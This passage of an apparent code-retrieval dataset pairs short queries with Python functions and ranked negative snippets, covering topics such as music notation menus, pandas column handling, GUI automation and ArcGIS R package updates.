\"point\": {\"color\": (255,0,0), \"paint\": fshape.FILL, \"z-index\":0},\n \"line\": {\"color\": (0,255,0), \"paint\": fshape.STROKE, \"z-index\":0},\n \"area\": {\"color\": (0,0,255), \"paint\": fshape.FILL, \"z-index\":0},\n \"text\": {\"color\": (0,0,0), \"angle\":0, \"paint\": fshape.FILL, \"z-index\":0}\n }\n \n # jeigu simbolis yra nurodytas, tai cia jo stiliaus aprasymas\n self._css_symbol = {\n \"graphics\": {\"z-index\":1000, \"color\": (255,0,0), \"line-width\":0.12} # ocad simboliams kurie yra paversti i grafika\n #\"901_1\": {\"name\":\"Road\", \"color\": (204, 204, 204)}\n }" ]
[ "0.75155187", "0.7069215", "0.7048573", "0.67138267", "0.6654528", "0.6436224", "0.64141214", "0.6291772", "0.62115586", "0.5974821", "0.58186597", "0.58115596", "0.5777675", "0.5759348", "0.57558227", "0.574919", "0.5748142", "0.5734577", "0.5732519", "0.57291174", "0.5689746", "0.56616294", "0.56616294", "0.5617734", "0.5523439", "0.55169594", "0.55166966", "0.5494595", "0.549027", "0.54690593" ]
0.77099824
0
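The interesting piece in this record is the retry idiom: `wait_until_passes` re-invokes a callable until it stops raising the listed exceptions or the timeout expires. The GUI-free demo below, with an invented `flaky` stand-in for `open_dialog`, shows the mechanics:

```python
from pywinauto.timings import wait_until_passes

attempts = {"n": 0}

def flaky():
    # Fails twice, then succeeds -- mimicking a dialog that is not
    # ready the first time it is poked.
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise LookupError("element not found yet")
    return "ok"

result = wait_until_passes(func=flaky, exceptions=(LookupError,),
                           timeout=5, retry_interval=0.1)
print(result, "after", attempts["n"], "attempts")  # -> ok after 3 attempts
```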
The key signature of the song.
def key_signature(self):
    text = self._get_menu_item_text('Edit->Key Signature')
    return re.search(r'\[([A-G].?)\]$', text).group(1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _build_signature(self):\n sig_contents = \\\n self.payload + \".\" + \\\n b64encode(b\"application/xml\").decode(\"ascii\") + \".\" + \\\n b64encode(b\"base64url\").decode(\"ascii\") + \".\" + \\\n b64encode(b\"RSA-SHA256\").decode(\"ascii\")\n sig_hash = SHA256.new(sig_contents.encode(\"ascii\"))\n cipher = PKCS1_v1_5.new(self.private_key)\n sig = urlsafe_b64encode(cipher.sign(sig_hash))\n key_id = urlsafe_b64encode(bytes(self.author_handle, encoding=\"utf-8\"))\n return sig, key_id", "def signature(self):\n return self._signature", "def signature(self):\n return self._signature", "def signature(self):\n return self._signature", "def raw_key(self) -> bytes:\n return bytes(self.data_bytes[ProofPath._Positions.KEY_POS : ProofPath._Positions.KEY_POS + KEY_SIZE])", "def raw(self) -> bytes:\n return bytes(self._signing_key)", "def public_key(self):", "def signature(self) -> str:\n return self[\"Sns\"][\"Signature\"]", "def public_key(self):\n keyfile = self._get_field('System', 'keyfile')\n return join(self.key_path, keyfile)", "def key(self):\n return self._key.decode('utf-8')", "async def server_public_key(self) -> bytes:\n raise NotImplementedError", "def _get_key(self):\n if not self.session:\n key = self.key\n else:\n key = self.session.get(\"_signature_key\")\n if key is None:\n key = str(uuid.uuid1())\n self.session[\"_signature_key\"] = key\n return key", "def signature(self) -> object:\n return self._signature", "def signature(self) -> object:\n return self._signature", "def public_signing_key(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"public_signing_key\")", "def signature_version(self) -> str:\n return self[\"Sns\"][\"SignatureVersion\"]", "def key_for_signature(self, data, sig):\n verification = self.verify(data, sig)\n return PublicKey.objects.filter(\n fingerprint=verification.fingerprint,\n profile__verified=True,\n ).first()", "def signature(self) -> Signature:\n return self._solders.signatures[0]", "def signature(self, params):\n string = ''.join(key + params[key] for key in sorted(params.keys()))\n return md5(string + self.cfg('secret'))", "async def client_public_key(self) -> bytes:\n raise NotImplementedError", "def fingerprint(self):\n return self.gpg.list_keys()[0]['fingerprint']", "def private_key():\n return \"Toholampi summer festival 2017 has the most harcore rock bands\"", "def private_key(self):", "def RSA_SIGNATURE_HASH() :\n return \"SHA-256\"", "def calculate_key_signature(public_key: str) -> str:\n rsa_obj = RSA.import_key(public_key)\n rsa_der = rsa_obj.export_key(\"DER\")\n\n hasher = SHA1.new()\n hasher.update(rsa_der)\n fingerprint = base64url_encode(hasher.digest())\n\n return fingerprint.decode(\"utf8\")", "def public_key(self): # pragma: no cover\n raise NotImplementedError()", "def sign(self):\n private_key = serialization.load_pem_private_key(\n binascii.unhexlify(self.sender_private_key.encode('utf8')),\n password=None,\n backend=default_backend()\n )\n signature = private_key.sign(\n str(self.to_dict()).encode('utf8'),\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n\n return signature", "def verkey(self) -> str:\n\n return self._verkey", "def get_public_key(self):\n return self.private_key.get_verifying_key()", "def Sign(self):\n return self.hmac.digest()" ]
[ "0.69159144", "0.68707407", "0.68707407", "0.68707407", "0.6732909", "0.658839", "0.65777826", "0.6566842", "0.6536141", "0.6520834", "0.64927524", "0.6490056", "0.6486773", "0.6486773", "0.64298445", "0.64217603", "0.6413349", "0.63893026", "0.63876134", "0.6386294", "0.6298452", "0.6245364", "0.6212571", "0.61962026", "0.61852556", "0.6143322", "0.61065423", "0.6104973", "0.6103501", "0.6080038" ]
0.7109579
0
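The key-signature property reduces to one regex. A standalone check, with made-up menu strings standing in for whatever `_get_menu_item_text` returns:

```python
import re

def parse_key(text):
    return re.search(r'\[([A-G].?)\]$', text).group(1)

for menu_text in ("Key Signature... [C]",
                  "Key Signature... [Bb]",
                  "Key Signature... [F#]"):
    print(parse_key(menu_text))  # -> C, Bb, F#
```

The optional `.?` after `[A-G]` is what lets a bare tonic like `[C]` and an accidental like `[Bb]` match the same pattern.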
The time signature (meter) of the song.
def time_signature(self):
    text = self._get_menu_item_text('Edit->Meter (Time Signature)')
    return re.search(r'\[([0-9]+/[0-9]+)\]$', text).group(1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_signingTime(self):\n\n return self.get_POW().signingTime()", "def time(self) -> int:\n return self.raw[\"time\"]", "def getTime(self) -> float:\n return self.t", "def getTime(self):\n return _osgAnimation.Keyframe_getTime(self)", "def get_time(self) -> float:\n raise NotImplementedError()", "def timeTime(self):\n return self._micros / 1000000.0", "def time(self) -> float:\n return self._time", "def atime(self):\n return safeInt(self.tag(\"atime\"))", "def time(self):\n return signal_base_get_time(self.obj)", "def get_snapshot_time(self) -> float:\n return self._snapshot_time", "def tic(self):\n return self._timestamp", "def time(self):\n\t\treturn self._time", "def time(self):\n try:\n if self.single_date:\n return self.stime\n else:\n return self.stime + (self.etime - self.stime) / 2\n except TypeError:\n return None", "def calculate_timestamp(self):\n return ((self.calculate_record_number() - 1) * SAMPLE_RATE) + \\\n self.time_on", "def getTimestamp(self):\r\n\t\treturn self.pair.data['timestamp']", "def start_time(self):\n return RPR.GetAudioAccessorStartTime(self.id)", "def getTime(self):\n return _osgAnimation.Motion_getTime(self)", "def time(self) -> float:\n return self.sim_scene.data.time", "def get_stamp(self):\n return self.timestamp", "def time(self):\n # type: () -> int\n return self._time", "def tt(self):\n return self.MJD + self.tt_ut1 + 2400000.5", "def get_time(self):\n return self.get_timed() / 10.0", "def microsecond(self):\n return self._microsecond", "def timestamp(self) -> int:\r\n\r\n return self.__timestamp", "def getTime(self):\n return self.step / (self.max_step + int(self.include))", "def time(self):\n return self.raw[\"logTime\"]", "def time(self):\n return self._time", "def ms(self):\n\t\treturn self._ms", "def timestamp(self):\n return time.time()", "def timestamp(self):\n return self.__timestamp" ]
[ "0.6606404", "0.64903015", "0.64892113", "0.6447548", "0.64385873", "0.633328", "0.6330664", "0.627636", "0.6260411", "0.6224092", "0.6214561", "0.6208507", "0.62078905", "0.6193222", "0.6189002", "0.61833715", "0.61824566", "0.6165584", "0.6165227", "0.6151058", "0.6149589", "0.6149008", "0.6137132", "0.61282855", "0.61210155", "0.6115817", "0.611559", "0.6112285", "0.611132", "0.61090255" ]
0.7741977
0
The tempo of the song.
def tempo(self):
    text = self._get_menu_item_text('Edit->Tempo')
    return float(re.search(r'\[([0-9.,]+)\]$', text).group(1))
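# Example (assumed menu text): if the menu item reads 'Tempo [120.0]',
# this returns the float 120.0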
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_tempo(self, tempo):\n self._tempo = tempo", "def tempo(signal,fs,hop_len = 64, **kwargs):\n tempo, beats = librosa.beat.beat_track(y=signal, sr=fs, hop_length=hop_len)\n return tempo", "def analyze_tempo(self, sample):\n # get beat from sample\n is_beat = self.tempo_analyzer(sample)\n\n # if has a beat\n if is_beat:\n this_beat = self.tempo_analyzer.get_last_s()\n\n # add beat to list of beats\n self.beats.append(this_beat)\n\n # if have at least 4 beats, analyze\n if len(self.beats) > 4:\n # analyze tempo\n self.curr_tempo = int(beats_to_bpm(self.beats))\n\n # remove beats that were analyzed\n del self.beats[0]\n\n # return bpm\n return self.curr_tempo\n # if not enough beats to analyze, return last known value\n return self.curr_tempo", "def tempo_gen(tempo=120, srate=None):\n dt = tempo / (60 * get_srate(srate))\n return (i * dt for i in count())", "def tempo(beats, trk=None, bt=480):\n if not trk:\n trk = MidiTrack()\n trk.name = \"Tempo variation\"\n trk.append(MetaMessage(\"set_tempo\",\n tempo=beats[0],\n time=0))\n\n for i, beat in enumerate(beats):\n trk.append(MetaMessage(\"set_tempo\",\n time=bt,\n tempo=beat))\n\n return trk", "def get_time(self) -> float:\n # if the controller is playing we must play the music if paused\n if self.controller.playing and self.music.paused:\n self.music.set_time(self.controller.time)\n self.music.start()\n return self.controller.time\n\n # If the controller is not playing and music is not paused, we need to pause music\n if not self.controller.playing and not self.music.paused:\n self.music.pause()\n self.music.set_time(self.controller.time)\n return self.controller.time\n\n rt = super().get_time()\n t = self.music.get_time()\n\n if abs(rt - t) > 0.1:\n # print(\"Music out of sync!!!\", t, rt)\n self.music.set_time(rt)\n return rt\n\n return t", "def get_tone_frequency(self):\n return self.tone_frequency", "def fetch_item_tempo(lib, loglevel, item, write):\n # Skip if the item already has the tempo field.\n if item.bpm:\n log.log(loglevel, u'bpm already present: %s - %s - %s' %\n (item.artist, item.title, item.bpm))\n return\n\n\n # Return generated tempo.\n tempo = get_file_bpm(item.path)\n if not tempo:\n log.log(loglevel, u'tempo not generated: %s - %s' %\n (item.artist, item.title),test)\n return\n\n log.log(loglevel, ui.colorize('text_success', 'Generated tempo :') + u' %s - %s' %\n (item.artist, item.title))\n# log.log(loglevel, ui.colorize('text_success', 'GENERATED:')) + log.log(loglevel, u'generated tempo: %s - %s' %\n# (item.artist, item.title))\n\n# log.log(loglevel, ui.colorize('text_success', 'GENERATED:'))\n# log.log(loglevel, u'generated tempo: %s - %s' %\n# (item.artist, item.title))\n item.bpm = int(tempo)\n if write:\n item.try_write()\n item.store()", "def track_duration(self):\n return self._track_duration", "def cur_song(self):\n if self._cur_song is None:\n self.restart()\n return self._cur_song", "def media_position(self):\n return (\n self._table.active_track_total_time\n - self._table.active_track_remaining_time\n ).total_seconds()", "def duration(self):\n with audioread.audio_open(self.path) as f:\n return f.duration", "def duration_in_seconds(self):\n \"Should not set track length\"\n return self.duration / float(self.samplerate)", "def get_tempo(track_id: str) -> float:\n token = _get_token()\n headers = dict(Authorization=f'Bearer {token}')\n endpoint = f'https://api.spotify.com/v1/audio-features/{track_id}'\n response = requests.get(endpoint, headers=headers)\n if response.status_code == 200:\n return 
response.json().get('tempo')\n else:\n raise SpotifyAPIError(response.json())", "def tic(self):\n return self._timestamp", "def tempo_r(mid, beats, rs):\n bt = mid.ticks_per_beat\n trk = MidiTrack()\n trk.name = \"Tempo variation\"\n trk.append(MetaMessage(\"set_tempo\",\n tempo=beats[0],\n time=0))\n\n for i, beat in enumerate(beats):\n r = rs[i]\n if r == 0: # For the deterministic case\n tempo_r = beat\n else:\n tempo_r = rd.randint(beat-int(beat*r), beat + int(beat*r)) + 1\n trk.append(MetaMessage(\"set_tempo\",\n time=bt,\n tempo=tempo_r))\n\n mid.tracks.append(trk)\n return mid", "def ms(self):\n # my clock uses seconds internally\n return 1000 * self.read()", "def getTempo():\r\n global dauer\r\n \r\n dauer = 0.0\r\n counter = 1\r\n\r\n for x in midi_data.get_tempo_changes(): #pretty_midi saves the tempo of a midi-file in nested-arrays, therefore a few for-loops and if statements are necessary\r\n for e in x:\r\n if e > 0:\r\n if counter > 0:\r\n tempi.append(round(e))\r\n counter = 0\r\n break\r\n \r\n dauer = 60000/(e/4)", "def to_music21_metronome(tempo: Tempo) -> MetronomeMark:\n metronome = MetronomeMark(number=tempo.qpm)\n metronome.offset = tempo.time\n return metronome", "def getTime(self) -> float:\n return self.t", "def get_sound_speed(self):\n return calculate_speed_of_sound(self.T, self.H, self.p)", "def get_next_song(self):\r\n if self.timestamp:\r\n delta = datetime.datetime.now() - self.timestamp\r\n if delta < timedelta(seconds=3):\r\n self.log.warning(u\"Song '%s' stopped playing after less than 3 seconds for some reason!\" % self.meta)\r\n time.sleep(3)\r\n self.timestamp = datetime.datetime.now()\r\n\r\n song = self.findQueued()\r\n\r\n self.meta = u\"%s - %s\" % (song.artist(), song.title)\r\n self.log.debug(\"Now playing \\\"%s\\\" [ID %s]\" % (song.title, song.id))\r\n self.song = song\r\n\r\n try:\r\n filepath = song.file.path.encode(self.fsenc)\r\n except:\r\n try:\r\n filepath = song.file.path.encode(self.sysenc)\r\n except:\r\n filepath = song.file.path\r\n self.log.debug(\"Returning path %s\" % filepath)\r\n return filepath", "def media_duration(self):\n return self._table.active_track_total_time.total_seconds()", "def set_time(self, value: float):\n super().set_time(value)\n self.music.set_time(value)", "def _duration(self):\n if getattr(self, '_duration_cache', None):\n return self._duration_cache\n duration = extractMetadata(guessParser(\\\n InputIOStream(self))).get('duration')\n if not duration:\n raise Exception(u'Not an audio file')\n else:\n duration = duration.seconds\n self._duration_cache = duration\n return duration", "def duration(self):\r\n\t\treturn (self.globEnd - self.globStart)", "def get_current_play_time(self):\n return self.get(COMMAND_UIC, 'GetCurrentPlayTime')", "def get_time(self) -> float:\n return self.player.time", "def media_track(self):\n return self.coordinator.data.nowplaying[self.zone.SourceID].QueueSongIndex", "def tt(self):\n return self.MJD + self.tt_ut1 + 2400000.5" ]
[ "0.69736135", "0.6595954", "0.6365309", "0.6310555", "0.61785966", "0.61531806", "0.6058358", "0.576273", "0.57180995", "0.57065964", "0.5647518", "0.56118566", "0.56033045", "0.5536001", "0.5516438", "0.5497539", "0.5480728", "0.5466305", "0.5449493", "0.5441588", "0.54408973", "0.5435366", "0.5428752", "0.54123014", "0.5404277", "0.537793", "0.5374817", "0.53700966", "0.53468347", "0.5343705" ]
0.6787653
1
Formats the DF and adds missing columns
def add_missing_columns(df, columns):
    df_columns = list(df.columns)
    table_columns = columns
    col_not_in_df = set(table_columns) - set(df_columns)
    # print(f' missing columns from df : {col_not_in_df}')
    for col in col_not_in_df:
        df[col] = ''
    df = df[table_columns]
    # print(f' added missing columns to df')
    # print(f' final df col length : {len(df.columns)}')
    return df
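# Example (hypothetical): for a df with columns ['a'] and columns=['a', 'b'],
# this adds an empty-string column 'b' and reorders the frame to ['a', 'b']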
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_missing_fields(df, inventory_acronym, f, maintain_columns=False):\n # Rename for legacy datasets\n if 'ReliabilityScore' in df:\n df = df.rename(columns={'ReliabilityScore': 'DataReliability'})\n # Add in units and compartment if not present\n if 'Unit' in f.fields() and 'Unit' not in df:\n df['Unit'] = 'kg'\n if 'Compartment' in f.fields() and 'Compartment' not in df:\n try:\n compartment = inventory_single_compartments[inventory_acronym]\n except KeyError:\n log.warning('no compartment found in inventory')\n compartment = ''\n df['Compartment'] = compartment\n for field in f.fields():\n if field not in df:\n df[field] = None\n # Resort\n col_list = f.fields()\n if maintain_columns:\n col_list = col_list + [c for c in df if c not in f.fields()]\n df = df[col_list].reset_index(drop=True)\n return df", "def complete_columns(training_df, valid_df):\n for c in valid_df.columns:\n if c not in training_df.columns:\n training_df[c] = 0\n for c in training_df.columns:\n if c not in valid_df.columns:\n valid_df[c] = 0\n return training_df, valid_df", "def fix_data(self, df):\n return df.dropna(axis='columns', how='all').fillna(0.0)", "def add_cols_to_cleaned_df(df):\n\n core_cols = ['time','lat','lon','depth','year','month','week','dayofyear','float_id','cycle']\n template_cols = core_cols + bgc_data_columns\n template_df = pd.DataFrame(columns=template_cols)\n df = template_df.append(df)[template_cols]\n return df", "def fill_mising(self, dict):\t\n\t\tfor name, df in dict.items():\n\t\t\tdf = df.fillna(method='pad')\n\t\t\tdict[name] = df\n\t\treturn dict", "def augment_dataframe(self, df: pd.DataFrame) -> pd.DataFrame:", "def fill_missing(self):\n df = self.df\n # Filling with default values\n logger.debug(\"Filling from distributions...\")\n for field in HeatStrokeDataFiller.default_map or field in HeatStrokeDataFiller.positive_default:\n if field not in df.columns:\n logger.warning(\"(%s) missing from data-frame columns\" % field)\n continue\n logger.debug(\"Setting missing in \\\"%s\\\" to default: %s\" % (field, HeatStrokeDataFiller.default_map[field]))\n default_value = HeatStrokeDataFiller.default_map[field]\n\n where = HeatStrokeDataFiller.find_where_missing(df, field, find_nan=True, find_str=False)\n how_many_to_fill = np.sum(where)\n if field in HeatStrokeDataFiller.positive_default:\n # Use default positive dietributions\n distribution = HeatStrokeDataFiller.positive_default[field]\n df[field].loc[where] = distribution(how_many_to_fill)\n else:\n logger.debug(\"Using default %s for field: %s\" % (default_value, field))\n # Use default values\n df[field].loc[where] = np.array([default_value] * how_many_to_fill)\n\n # Filling with Zeros\n logger.debug(\"Fillling with zeros...\")\n for field in HeatStrokeDataFiller.fields_to_fill_with_zero:\n if field not in df.columns:\n logger.warning(\"\\\"%s\\\" missing from columns\" % field)\n continue\n logger.debug(\"Setting missing in \\\"%s\\\" to 0\" % field)\n\n where = HeatStrokeDataFiller.find_where_missing(df, field, find_nan=True, find_str=True)\n how_many_to_fill = np.sum(where)\n df[field].loc[where] = np.zeros(how_many_to_fill)\n\n # Filling in columns with the average from the rest of the column\n logger.debug(\"Filling with agerages...\")\n for field in HeatStrokeDataFiller.fields_to_fill_with_average:\n if field not in df.columns:\n logger.warning(\"\\\"%s\\\" missing from data-frame columns\" % field)\n continue\n\n where = HeatStrokeDataFiller.find_where_missing(df, field, find_nan=True, find_str=True)\n data = 
df[field][np.invert(where)]\n mean = np.mean(data)\n std = np.std(data)\n if mean == np.nan or std == np.nan:\n mean, std = (0, 0)\n logger.debug(\"Setting missing in \\\"%s\\\" with: %.3f +/- %.3f\" % (field, mean, std))\n how_many_to_fill = np.sum(where)\n df[field].loc[where] = mean + std * np.random.random(how_many_to_fill)\n\n fields_not_modified = set(df.columns) - set(HeatStrokeDataFiller.default_map.keys()) - HeatStrokeDataFiller.fields_to_fill_with_zero - HeatStrokeDataFiller.fields_to_fill_with_zero\n logger.debug(\"Fields not modified: %s\" % fields_not_modified.__str__())\n return df", "def cols_missing_pect(self, df, first_index):\n cols = Config.FEATURE_DEFINITION['integer_cols'] + \\\n Config.FEATURE_DEFINITION['float_cols'] + \\\n Config.FEATURE_DEFINITION['category_cols']\n missing_df = pd.DataFrame(columns=cols)\n\n for building, data in df.groupby('series_id'):\n fig, ax = plt.subplots(figsize=(7,5))\n data = data[cols + ['timestamp']]\n min_date = data[first_index].first_valid_index()\n if min_date:\n data = data[data.index >= min_date]\n data = data.reset_index(drop=True).resample('M', on='timestamp').first().drop(columns=[\"timestamp\"])\n string_missing_df = (data.isnull().sum() * 100 / len(data))\n string_missing_df['series_id'] = building\n missing_df = missing_df.append(string_missing_df, ignore_index=True)\n missing_df = missing_df.set_index('series_id')\n \n return missing_df", "def clean(dataframe):\n # replace 'unknown' in Pop. density with np.nan\n dataframe = dataframe.replace('unknown', np.nan)\n\n # remove spaces from column names and content\n dataframe.columns = dataframe.columns.str.strip()\n\n # change YYYYMMDD to days of the year\n date_debug = []\n for i in range(1, 366):\n date_debug.append(i)\n\n dataframe2 = {'YYYYMMDD': date_debug}\n dataframe['YYYYMMDD'] = dataframe2['YYYYMMDD']\n\n return dataframe", "def clean_columns(df: pd.DataFrame, filled_rate: float = 0.6) -> pd.DataFrame:\n\n print(f\"Initial shape of the dataframe: {str(df.shape) : >17}\")\n # keep columns that are filled more than the filled rate, default = 60%\n df = df.loc[:, (df.isnull().mean() < (1 - filled_rate))]\n print(f\"Shape after removing null columns: {str(df.shape) : >14}\")\n\n return df", "def get_df(self,**kwargs):\n df = super().get_df(**kwargs)\n if self.automatically_fill_missing_columns == True:\n if df['year_of_birth'].isnull().all():\n df['year_of_birth'] = self.tools.get_year(df['birth_datetime'])\n\n if df['month_of_birth'].isnull().all():\n df['month_of_birth'] = self.tools.get_month(df['birth_datetime'])\n\n if df['day_of_birth'].isnull().all():\n df['day_of_birth'] = self.tools.get_day(df['birth_datetime'])\n \n return df", "def _add_fips_if_missing(df: pd.DataFrame):\n if CommonFields.FIPS not in df.columns:\n df[CommonFields.FIPS] = df[CommonFields.LOCATION_ID].apply(pipeline.location_id_to_fips)", "def check_dataframe_columns(df):\r\n if len(set(df.columns).intersection(\r\n set([constants.CASE_CONCEPT_NAME, xes_constants.DEFAULT_NAME_KEY,\r\n xes_constants.DEFAULT_TIMESTAMP_KEY]))) < 3:\r\n raise Exception(\r\n \"please format your dataframe accordingly! 
df = pm4py.format_dataframe(df, case_id='<name of the case ID column>', activity_key='<name of the activity column>', timestamp_key='<name of the timestamp column>')\")", "def clean(df):", "def handle_missing_data(self, dataframe):\n return dataframe", "def update_column_format(self):\n pass", "def prepare_input_df(df: DataFrame) -> DataFrame:\r\n df = df.fillna('') # Fill np.nan values with blanks (\"\").\r\n df = to_upper(df) # Force case to UPPER for all columns.\r\n df = strip_columns(df) # Remove trailing whitespace.\r\n return df", "def format_dataframe(dat_file,column_names,index):\n df = pd.read_csv(dat_file,sep='\\s+',names=column_names)\n df = df.iloc[1:]\n df = df.drop(columns='id')\n df = df.set_index(index)\n return df", "def fill_missing(self) -> None:\n\n self.fill_missing_rows()\n self.fill_missing_source_parameters()\n return", "def _make_blank(cls) -> pd.DataFrame:\n spec = list(zip(cls._required_columns, cls._required_dtypes))\n try:\n arr = np.zeros(0, dtype=spec)\n return pd.DataFrame(arr)\n except TypeError as exc:\n raise TypeError(r\"{exc}: {spec}\") from exc", "def __clean_df(self):\n self.__convert_min()", "def finalize_dataframe(self, dataframe: DataFrame):\n # Drop duplicates (some geospatial datasets, like ZCTAs, include redundant rows)\n geo_names = {'geometry'}\n non_geo_names = set(dataframe.columns) - geo_names\n dataframe = dataframe.drop_duplicates(subset=non_geo_names, ignore_index=True)\n\n # Insert NAs for annotated row values to avoid outlier values like -999,999,999\n dataframe.loc[dataframe['annotation'].notnull(), 'value'] = ''\n dataframe['value'] = pd.to_numeric(dataframe['value'], errors='coerce')\n\n # Create year date column\n dataframe['date'] = pd.to_datetime(\n dataframe['year'].astype('string') + '-12-31', format='%Y-%m-%d'\n )\n\n # Rename and reorder columns\n names_csv = resource_string(__name__, 'resources/names.csv')\n csv_reader = reader(StringIO(names_csv.decode('utf-8')))\n next(csv_reader) # Skip header row\n names = dict(csv_reader) # type: ignore\n if self.geometry in ['points', 'polygons'] and (set(dataframe.columns) & geo_names):\n name_order = [*names.values(), *geo_names]\n else:\n name_order = list(names.values())\n dataframe = dataframe.rename(columns=names)[name_order]\n\n return dataframe", "def clean_store_csv(df: pd.DataFrame) -> pd.DataFrame:\n cols = map(convert_to_snake_case, df.columns)\n df.columns = cols\n\n for col in ['promo2_since_week', 'promo2_since_year',\n 'competition_distance', 'competition_open_since_month',\n 'competition_open_since_year']:\n df[col] = df[col].fillna(df[col].mean())\n\n df['promo_interval'] = df.promo_interval.fillna('None')\n return df", "def fill_features(df, features):\n existing = df.columns\n\n # Drop untrained features\n for feat in existing:\n if feat not in features:\n df.drop(feat, axis=1, inplace=True)\n\n # Add missing features\n for feat in features:\n if feat not in existing:\n df[feat] = 0\n\n # Return with column selection for ordering\n return df[features]", "def _add_missing_cols(user_list, fields=None):\n new_list = []\n required_cols = ['type', 'id', 'view_href', 'login']\n\n # Add any defined fields to the list of required columns\n if fields and fields != '*':\n parsed_fields = fields.split(',')\n for field in parsed_fields:\n if field not in required_cols:\n required_cols.append(field)\n\n # Loop through the messages and add any missing columns\n for user in user_list:\n for col in required_cols:\n if col not in user:\n user[col] = ''\n new_list.append(user)\n 
return new_list", "def CleanUp(self):\n blankColumnPattern = re.compile('^-*$')\n blankColumns = []\n for columnIndex in range(self.alignment.get_alignment_length() - 1):\n columnValues = self.alignment[:,columnIndex]\n match = blankColumnPattern.search(columnValues)\n if (match):\n blankColumns.append(str(columnIndex))\n for column in blankColumns[::-1]:\n self.DeleteRange(',' + str(column), True)\n self.Show(self.displayedColumn)\n self.BackupAlignment()", "def _dataframe_preprocess(self):\n # 1. add baisc feature like date, time in day, ....\n if self.data_type != 'porto':\n self.df['TIMESTAMP'] = self.df.apply(lambda df: df['TIMESTAMPS'][0], axis=1)\n self.df['TIME'] = pd.to_datetime(self.df['TIMESTAMP'], unit='s', utc=True)\n \n self.df.TIME = self.df.TIME.dt.tz_convert(self.timezone)\n # 2. group df for specific driver analysis\n self.grouped_df = self.df.groupby('LABEL')\n if self.count_od_info:\n if 'SD' not in self.df.columns:\n self._add_OD_info()\n self.grouped_od = self.df.groupby('SD')", "def format_df(df):\n df = df.transpose()\n df.rename(columns=df.iloc[0], inplace=True)\n df.drop('gene', inplace=True)\n df.index.rename('sample_id', inplace=True)\n return df", "def format_df(df):\n df = df.transpose()\n df.rename(columns=df.iloc[0], inplace=True)\n df.drop('gene', inplace=True)\n df.index.rename('sample_id', inplace=True)\n return df", "def combine_columns(allowed_columns):\n\n v_columns = [v for v in allowed_columns if v in df.columns]\n v_columns.sort()\n for i in range(1, len(v_columns)):\n df[v_columns[0]] = df[v_columns[0]].fillna(df[v_columns[i]])\n df.drop(v_columns[i], 1, inplace=True)\n return v_columns[0]" ]
[ "0.641115", "0.6301545", "0.6252176", "0.6246336", "0.621779", "0.6163167", "0.61629313", "0.61473024", "0.6107609", "0.6089415", "0.6087212", "0.60132515", "0.6011982", "0.59927666", "0.59733063", "0.5875654", "0.58720547", "0.5864852", "0.5810072", "0.5796086", "0.578949", "0.5781051", "0.5777082", "0.5765621", "0.5760843", "0.5760247", "0.575826", "0.5735501", "0.5735501", "0.570075" ]
0.6645317
0
Update ArcGIS R bindings on this machine.
def update_package(r_library_path=r_library_path):
    # TODO make sure that the package isn't loaded before updating?
    info = arcpy.GetInstallInfo()
    arc_version = info['Version']
    product = info['ProductName']
    if arc_version in ('10.1', '10.2', '10.3.0') and product == 'Desktop':
        arcpy.AddError("The ArcGIS R bridge requires ArcGIS 10.3.1 or later.")
        sys.exit()
    if arc_version in ('1.0', '1.0.2') and product == 'ArcGISPro':
        arcpy.AddError("The ArcGIS R bridge requires ArcGIS Pro 1.1 or later.")
        sys.exit()
    # TODO also check for the 10.3.1 package version in case of copy-only?
    if r_pkg_version() is None:
        arcpy.AddWarning(
            "Package is not installed. First use the \"Install R bindings\" script.")
    else:
        if compare_release_versions():
            arcpy.AddMessage("New release detected! Installing.")
            install_package(overwrite=True, r_library_path=r_library_path)
        else:
            msg = "The installed ArcGIS R package (version " + \
                "{}) is the current version on GitHub.".format(r_pkg_version())
            arcpy.AddMessage(msg)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def refresh_script_provider(self):\n if qgis_version() < 21600:\n from processing.core.Processing import Processing\n Processing.updateAlgsList()\n else:\n from processing.core.alglist import algList\n algList.reloadProvider('script')", "def refresh(self):\n self.update_from_file()\n self.update_from_env()", "def update_runtime_variables(self) -> None:\n\n self.update_defines()\n self.update_includes()\n self.update_modules()", "def update_requirements():\n\n require('code_root', provided_by=env.environments)\n requirements = os.path.join(env.code_root, 'requirements')\n sdists = os.path.join(requirements, 'sdists')\n base_cmd = ['pip install']\n base_cmd += ['-q -E %(virtualenv_root)s' % env]\n base_cmd += ['--no-index --find-links=file://%s' % sdists]\n # install GDAL by hand, before anything else that might depend on it\n cmd = base_cmd + ['--no-install \"GDAL==1.6.1\"']\n sudo(' '.join(cmd), user=env.deploy_user)\n # this directory won't exist if GDAL was already installed\n if files.exists('%(virtualenv_root)s/build/GDAL' % env):\n sudo('rm -f %(virtualenv_root)s/build/GDAL/setup.cfg' % env, user=env.deploy_user)\n with cd('%(virtualenv_root)s/build/GDAL' % env):\n sudo('%(virtualenv_root)s/bin/python setup.py build_ext '\n '--gdal-config=gdal-config '\n '--library-dirs=/usr/lib '\n '--libraries=gdal1.6.0 '\n '--include-dirs=/usr/include/gdal '\n 'install' % env, user=env.deploy_user)\n # force reinstallation of OpenBlock every time\n with settings(warn_only=True):\n sudo('pip uninstall -y -E %(virtualenv_root)s ebpub ebdata obadmin' % env)\n for file_name in ['ebpub.txt', 'ebdata.txt', 'obadmin.txt', 'openrural.txt']:\n apps = os.path.join(requirements, file_name)\n cmd = base_cmd + ['--requirement %s' % apps]\n sudo(' '.join(cmd), user=env.deploy_user)", "def pipupdate():\n\n packages = [d for d in pkg_resources.working_set]\n subprocess.call('pip install --upgrade ' + ' '.join(packages))", "def UpdateAccessBindings(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _fcn_link_roi(self):\n kwargs = self.cbqt.cbobjs._objs['roi'].to_kwargs(True)\n self.roi.update_from_dict(kwargs)\n self.roi._update_cbar()", "def 